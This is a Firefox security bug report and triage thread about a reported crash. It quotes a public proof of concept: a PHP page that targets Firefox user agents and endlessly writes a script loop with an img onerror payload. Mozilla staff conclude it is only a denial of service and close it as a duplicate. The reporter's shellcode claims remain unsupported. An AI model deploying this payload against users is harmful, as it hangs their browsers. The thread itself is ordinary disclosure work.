possible exploitable crash

RESOLVED DUPLICATE of bug 817629

Status

()

Core
DOM
RESOLVED DUPLICATE of bug 817629
5 years ago
4 years ago

People

(Reporter: curtisk, Unassigned)

Tracking

unspecified
Points:
---
Bug Flags:
sec-bounty -

Firefox Tracking Flags

(Not tracked)

Details

(URL)

reported to sec@
=============//=============
Hi, 
i tried this exploit http://1337day.com/exploit/19964 in a fully updated mozilla browser and it did crash. The problem is that according to the immunity debugger logs, it may be possible for someone to inject a shellcode. In case you need anything, contact me to help out. Best regards
Mavrofidis Manolis

-- 
Πέτρην κοιλαίνει ρανίς ύδατος ενδελεχείη.
http://0x109.tuxfamily.org

=============//=============
copied script from quoted site
=============//=============

<!DOCTYPE html>
<html>
<body>
<?php
/* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
Base64  encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
//check if victim is Using Mozilla Firefox
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox)
{
//loop forever
while(1) {
//print exploit code infinite times.
print(base64_decode($exploit));
}
}
?>
</body>
</html>
 
# 1337day.com [2012-12-17]
Flags: sec-bounty?

Comment 1

5 years ago
What are "immunity debugger logs"? This is a DOS in the most obvious form. Do they have crash report IDs?

Comment 3

5 years ago
Immunity debugger "logs" are not logs, it is a word I used to avoid mentioning everything about the CPU registers, the heap, the stack etc. I did set up immunity dbg(later will be reffered as dbg) as just in-time debugger. Well, according to the dbg and the information it revealed about the firefox crash, registers and the heap allocation show a potential exploit out of this DOS vulnerability. As of this time, I haven't been able to build a stable exploit, I guess it needs some egg-hunting shellcode and I don't have sufficient time for this now, I may be attaching the firefox js engine in the debugger for more information about the subject. 

Best regards,
Manolis

Comment 4

5 years ago
Can you just provide a regular crash ID or a stack trace?
Flags: needinfo?(mmavrofides)
Duplicate of this bug: 822688
We are getting multiple reports of this same code from various sources. I suspect that there is a site that has this code and we are just now getting informed of these.
http://pastebin.com/SigzqudB

Title : Mozilla Firefox HTML/JS DOS Vulnerability - POC
Version : Mozilla Firefox Beta Version and Normal 17.0.1
Date : 2012-12-06
Vendor : http://www.mozilla.org
Impact : Medium
Contact : sergioyoshiman [at] gmail.com
Twitter : @sergioyoshiman
tested : windows XP SP3 & Windows 7 SP1
Author : Sergio Yoshikata - Lima , Peru
==============================================================
Mozilla Firefox JS POC
"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>

Comment 8

5 years ago
There is a site with the PoC, I already included it in my mail. I'll get you with a Crash ID and a trace in a couple of hours. I have a class now, so bear with me :)
Flags: needinfo?(mmavrofides)

Comment 9

5 years ago
Btw, it is being heavily distributed under a lot of sites such as 1337day.org and the rest dbs containing exploits, beyond the pastebin and the http://1337day.com/exploit/19964 . Full disclosure is the case here

Comment 10

5 years ago
It is being reported as a DOS. If you have information that this is exploitable, I haven't seen that publicly reported yet and I'd like to keep this closed until we know for sure.
Group: core-security

Updated

5 years ago
Group: mozilla-corporation-confidential, core-security

Updated

5 years ago
Group: mozilla-corporation-confidential

Comment 11

5 years ago
I already told you before, I have built an exploit that doesn't work at the time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the same vulnerability* that makes Firefox crash. I won't be giving the exploit. If I was to give the exploit, I'd build a stable one and then I'd sell it in the market and get some cash.

Don't make the same mistakes other vendors do. Just patch the hole and if the exploit still works, I'll let you know with the exploit included.

Best regards, 
Manolis

PS: The DoS is confirmed. The exploit works in OSes that don't have built-in protections such as ASLR,DEP etc. I'll be adding the crash ID in ten minutes hopefully.
The code here is identical to bug 817629, down to the alert(2) bit.

As I said in that bug, as far as I can tell this is not a security issue other than DoS, and is a duplicate of known non-security bugs.  I'll be happy to be proved wrong, of course!
(In reply to Manolis Mavrofidis from comment #11)
> I already told you before, I have built an exploit that doesn't work at the
> time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the
> same vulnerability* that makes Firefox crash. I won't be giving the exploit.
> If I was to give the exploit, I'd build a stable one and then I'd sell it in
> the market and get some cash.

You don't need an exploit to bypass ASLR/DEP to earn some bug bounty cash from us, but we do need to see something more than resource exhaustion.

Comment 14

5 years ago
OK, I'll dig into the subject further, build a stable exploit, and I'll file a new report with the exploit and/or further bugs that I may find during the exploration. Happy XMAS holidays everyone and guys, fix the bug :)
Manolis.

Updated

5 years ago
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 817629
Triage: opening this up.
Group: core-security
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.